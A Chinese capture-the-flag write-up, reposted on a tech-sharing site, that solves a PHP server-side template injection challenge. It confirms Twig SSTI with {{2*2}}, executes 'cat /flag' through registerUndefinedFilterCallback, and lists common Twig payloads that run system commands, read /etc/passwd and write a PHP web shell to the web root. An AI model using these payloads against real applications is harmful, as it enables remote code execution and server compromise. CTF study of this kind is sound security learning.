标签：twig self 如下 ssti so env stable SSTI 注入

1、打开之后在各个界面查看源代码，未发现很明显的有用信息，仅发现了提示，结果如下：

2、尝试输入数据，结果就是输入什么就回显什么，也未进行过滤，尝试进行sql注入失败，结果如下：

3、那就根据提示抓包查看下cookie信息，结果如下：

4、sql注入失败，这里想到了ssti注入，那就进行ssti注入测试，payload：{{2*2}}，结果如下：

5、确定了ssti注入之后，该如何选择ssti注入方式呢，观察抓取的数据包中存在关于服务端的关键信息，结果如下：

6、确定服务端的语言之后，范围就很小了，补充下各种语言发生ssti注入的模板，如下：

python: jinja2 mako tornado django
php:smarty twig Blade
java:jade velocity jsp

 7、确定此处产生ssti注入的模板可以为smarty、twig等，那就一个一个尝试，这里就直接使用twig模板的注入方式进行注入了，payload：{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}，结果如下：

twig常用的注入payload：

{{'/etc/passwd'|file_excerpt(1,30)}}
{{app.request.files.get(1).__construct('/etc/passwd','')}}
{{app.request.files.get(1).openFile.fread(99)}}
{{_self.env.registerUndefinedFilterCallback("exec")}}
{{_self.env.getFilter("whoami")}}
{{_self.env.enableDebug()}}{{_self.env.isDebug()}}
{{["id"]|map("system")|join(",")
{{{"<?php phpinfo();":"/var/www/html/shell.php"}|map("file_put_contents")}}
{{["id",0]|sort("system")|join(",")}}
{{["id"]|filter("system")|join(",")}}
{{[0,0]|reduce("system","id")|join(",")}}
{{['cat /etc/passwd']|filter('system')}}

这里附上另外一道ssti注入题的解析方式：https://www.cnblogs.com/upfine/p/16500169.html

ssti注入模板参考文章：http://t.zoukankan.com/bmjoker-p-13508538.html

标签：twig,self,如下,ssti,so,env,stable,SSTI,注入
来源： https://www.cnblogs.com/upfine/p/16534494.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。